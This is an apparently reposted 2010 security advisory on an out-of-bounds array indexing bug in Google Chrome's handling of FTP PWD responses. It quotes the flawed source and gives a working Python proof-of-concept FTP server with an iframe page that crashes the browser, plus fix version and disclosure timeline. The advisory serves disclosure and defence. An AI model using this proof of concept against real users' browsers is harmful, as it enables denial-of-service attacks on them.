扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 |
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Advisory: Google Chrome OOB Array Indexing Bug Advisory ID:TKADV2010-004 Revision: 1.0 Release Date: 2010/03/31 Last Modified:2010/03/31 Date Reported:2010/03/21 Author: Tobias Klein (tk at trapkit.de) Affected Software:Google Chrome <= 4.1.249.1042 (Build 42199) Remotely Exploitable: Yes Locally Exploitable:No Vendor URL: http://www.google.com/chrome/ Vendor Status:Vendor has released an updated version ====================== Vulnerability Details: ====================== Google Chrome is vulnerable to an out-of-bounds array indexing bug, caused by the improper handling of FTP PWD command server responses. By persuading a victim to visit a specially-crafted web site containing an iframe pointing to a malicious FTP server, a remote attacker could exploit this bug and cause the browser to crash. This bug affects the trusted browser kernel (privileged supervisor of the activities of the sandboxed processes). Tested Chrome version (Microsoft Windows): Google Chrome 4.1.249.1042 (Build 42199) WebKit 532.5 V81.3.18.22 User AgentMozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1042 Safari/532.5 ================== Technical Details: ================== File: net\ftp\ftp_network_transaction.cc [..] int FtpNetworkTransaction::ProcessResponsePWD(const FtpCtrlResponse& response) { switch (GetErrorClass(response.status_code)) { case ERROR_CLASS_INITIATED: return Stop(ERR_INVALID_RESPONSE); case ERROR_CLASS_OK: { // The info we look for should be on the first line. [1] std::string line = response.lines[0]; if (line.empty()) return Stop(ERR_INVALID_RESPONSE); [2] std::string::size_type quote_pos = line.find('"'); if (quote_pos != std::string::npos) { [3] line = line.substr(quote_pos + 1); [4] quote_pos = line.find('"'); if (quote_pos == std::string::npos) return Stop(ERR_INVALID_RESPONSE); [5] line = line.substr(0, quote_pos); } if (system_type_ == SYSTEM_TYPE_VMS) line = FtpUtil::VMSPathToUnix(line); [6] if (line[line.length() - 1] == '/') line.erase(line.length() - 1); current_remote_directory_ = line; next_state_ = STATE_CTRL_WRITE_TYPE; break; } case ERROR_CLASS_INFO_NEEDED: return Stop(ERR_INVALID_RESPONSE); case ERROR_CLASS_TRANSIENT_ERROR: return Stop(ERR_FAILED); case ERROR_CLASS_PERMANENT_ERROR: return Stop(ERR_FAILED); default: NOTREACHED(); return Stop(ERR_UNEXPECTED); } return OK; } [..] [1] The string 'line' points to the FTP server response. [2] Search for the first double quote (") in the response. [3] Point one byte after the first double quote. [4] Find the next double quote. [5] Extract the substring from the current position until the second double quote. [6] Check the extracted substring for a '/'. If the FTP server response consists of two double quotes followed directly after each other the code at [5] will result in a substring with a length of zero bytes. This leads to an out-of-bounds array index (line[0xffffffff]) at [6] that results in an application crash. ================= Proof of Concept: ================= Malicious FTP server: K:\BUGS\CHROME>type poc.py from socket import * from struct import pack from time import sleep host = "0.0.0.0" port = 21 s = socket(AF_INET, SOCK_STREAM) s.bind((host, port)) s.listen(1) print "\n[+] Google Chrome (4.1.249.1042) Denial of Service poc" print "[+] Listening on port %d ..." % port cl, addr = s.accept() print "[+] Connection accepted from %s" % addr[0] buffer = "220 Google Chrome (4.1.249.1042) Denial of Service poc" buffer += "\r\n" cl.send(buffer) cl.recv(128) buffer = "331 Password required for anonymous." buffer += "\r\n" cl.send(buffer) cl.recv(128) buffer = "230 User anonymous logged in." buffer += "\r\n" cl.send(buffer) cl.recv(128) buffer = "215 UNIX Type: bib" buffer += "\r\n" cl.send(buffer) cl.recv(128) buffer = "257 \"\"" buffer += "\r\n" cl.send(buffer) print "[+] Sending buffer: OK\n" sleep(1) cl.close() s.close() - - - - - --- Start the poc server: K:\BUGS\CHROME>python poc.py [+] Google Chrome (4.1.249.1042) Denial of Service poc [+] Listening on port 21 ... Open the following sample HTML page in Chrome: - - - - - --- <html> <body> <iframe name="POC" src="ftp://127.0.0.1"> </body> <html> - - - - - --- ========= Solution: ========= Update to Google Chrome >= 4.1.249.1045. ==================== Disclosure Timeline: ==================== Format: year/month/day 2010/03/21 - Chromium maintainers notified 2010/03/22 - Patch developed by Chromium maintainers 2010/03/30 - Fixed version of Google Chrome is available 2010/02/22 - Release date of this security advisory ======== Credits: ======== Vulnerability found and advisory written by Tobias Klein. =========== References: =========== [REF1] http://googlechromereleases.blogspot.com/2010/03/stable-update- disable-translate.html [REF2] http://bugs.chromium.org/38845 [REF3] http://www.trapkit.de/advisories/TKADV2010-004.txt ======== Changes: ======== Revision 0.1 - Initial draft release to the vendor Revision 1.0 - Public release =========== Disclaimer: =========== The information within this advisory may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. ================== PGP Signature Key: ================== http://www.trapkit.de/advisories/tk-advisories-signature-key.asc Copyright 2010 Tobias Klein. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: PGP Charset: utf-8 wj8DBQFLs6gPkXxgcAIbhEERAlH6AKD+UgqYNZpBD40+o7Yl8HjdsaVM1QCffMKa pqw8f2DGxim/+N1k+jCqbcQ= =mHHh -----END PGP SIGNATURE----- |
体验盒子
